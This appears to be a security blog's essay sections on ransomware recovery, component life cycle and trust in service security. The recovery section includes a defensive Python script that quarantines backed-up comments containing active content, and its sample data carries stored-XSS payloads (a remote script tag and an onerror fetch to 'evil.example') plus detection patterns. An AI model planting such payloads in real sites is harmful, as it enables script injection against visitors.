Recovery

Frequent backups are often recommended as the mitigation that lets a system be recovered from an attack, most often ransomware. Periodic backup matters, but the hard part is knowing whether the recovered system still carries the malicious code the threat actor planted; in other words, the backup may already include the persistent threat. This is complex and situation specific. Some thoughts to consider:
- Have a digital forensic expert examine the infected system, understand the attack path and the trigger for the malicious code, and re-validate that these behaviours are gone after complete system recovery, before returning to business.
- Segregate content from code, so that a clean system can be built from known-good code and the data restored separately. The challenges are the configuration and the data connectors, and whether the persistent threat is stored as data (typically in externally supplied content such as readers' comments).
There is no bullet-proof solution; the realistic goal is to maintain a hygienic information processing environment that reduces the likelihood:
- Adopt SecDevOps to address weaknesses during development and subsequent operations.
- Conduct periodic holistic cybersecurity assessments ...
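The "content versus code" point above is easiest to see in the restore step itself: the application code is redeployed from a known-good build, and the content store is not restored as an opaque blob but passed through a gate that quarantines records carrying active content (script elements, inline event handlers, javascript: URLs) for forensic review. The following is an added illustration, not code from the original post; the comment dump, the field names and the pattern list are constructed assumptions, and the patterns are deliberately broad so that doubtful records are quarantined rather than silently re-imported.

```python
import html
import re

# Constructed sample: reader comments as they would come out of a backup of
# the content store. Records 3 and 4 carry payloads that would be re-planted
# on every restore if the data were imported unchecked.
SAMPLE_DUMP = [
    {"id": 1, "author": "alice", "body": "Great article, thanks!"},
    {"id": 2, "author": "bob",
     "body": 'See <a href="https://example.org/ref">this reference</a>.'},
    {"id": 3, "author": "mallory",
     "body": 'Nice <script src="https://evil.example/p.js"></script>'},
    {"id": 4, "author": "mallory",
     "body": '<img src=x onerror="fetch(\'https://evil.example/c\')">'},
]

# Indicators of active content inside stored data (assumed list, broad on
# purpose: a false quarantine costs a manual look, a miss re-plants the threat).
ACTIVE_CONTENT = [
    (re.compile(r"<\s*script\b", re.I), "script element"),
    (re.compile(r"<\s*(iframe|object|embed)\b", re.I), "embedded object"),
    (re.compile(r"\bon[a-z]+\s*=", re.I), "inline event handler"),
    (re.compile(r"javascript\s*:", re.I), "javascript: URL"),
]


def findings(body: str) -> list[str]:
    """Return the labels of every active-content indicator found in body."""
    return [label for pattern, label in ACTIVE_CONTENT if pattern.search(body)]


def triage(records: list[dict]) -> tuple[list[dict], list[dict]]:
    """Split a dump into records safe to re-import and records to quarantine.

    Quarantined records keep a 'findings' list so the forensic reviewer knows
    why each one was held back instead of restored.
    """
    clean, quarantined = [], []
    for record in records:
        hits = findings(record["body"])
        if hits:
            quarantined.append({**record, "findings": hits})
        else:
            clean.append(record)
    return clean, quarantined


def render(body: str) -> str:
    """Output-side half of the separation: content is escaped when rendered,
    so even a record that slipped past triage cannot execute in the browser."""
    return html.escape(body, quote=True)


if __name__ == "__main__":
    safe, held = triage(SAMPLE_DUMP)
    print("restorable:", [r["id"] for r in safe])
    for r in held:
        print(f"quarantined #{r['id']} by {r['author']}: {', '.join(r['findings'])}")
    print("rendered #4:", render(SAMPLE_DUMP[3]["body"]))
```

The gate is only one layer: the escaped rendering of restored content is what keeps a stored payload inert even if triage misses it, and the quarantined records are the starting point for the forensic examination of how the content was planted.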

Life Cycle Management #2

As in the physical world, automation components have a finite lifetime. The mechanical parts of a traditional hard disk drive are one example: they are subject to wear and tear during their operating life. Storage technology has moved to solid state with no mechanical parts, but we must not forget the underlying platform and applications. They have no wear-and-tear operating condition, yet the advance of technology introduces obsolescence of the platform and applications. From the vendor's perspective, products no longer fit for purpose in the market are retired and the resources to support them are dropped. Hence, even if your automation components are still operating with minimal wear, they will still need to be refreshed to new versions, have bugs and vulnerabilities fixed, and retain continuous vendor support in order to maintain the business outcome. Proper life cycle management of ICT/ICS components cannot be overlooked. ...

Sense of Security

This is largely based on perception and trust. How do I trust that an infrastructure or system is secure? We need to look at these core elements:
- Is there a regulatory mandate in this industry sector? Take public transportation as an example: mandatory insurance coverage, regular inspection for licence renewal, periodic operator training, compliance with safety regulations, and so on.
- How well is the service provider doing among its peers? For instance, the type and severity of incidents at this provider in past years compared with others, and ratings from customer reviews and comments.
- How does the service provider demonstrate what has been done to secure the service? Common examples are transparency in personal data handling via the published privacy policy, alerting end users to logins from unusual locations, security tips on the official portal, and a committed service level pledge.
All of the above apply in both the physical and the cyber world. ...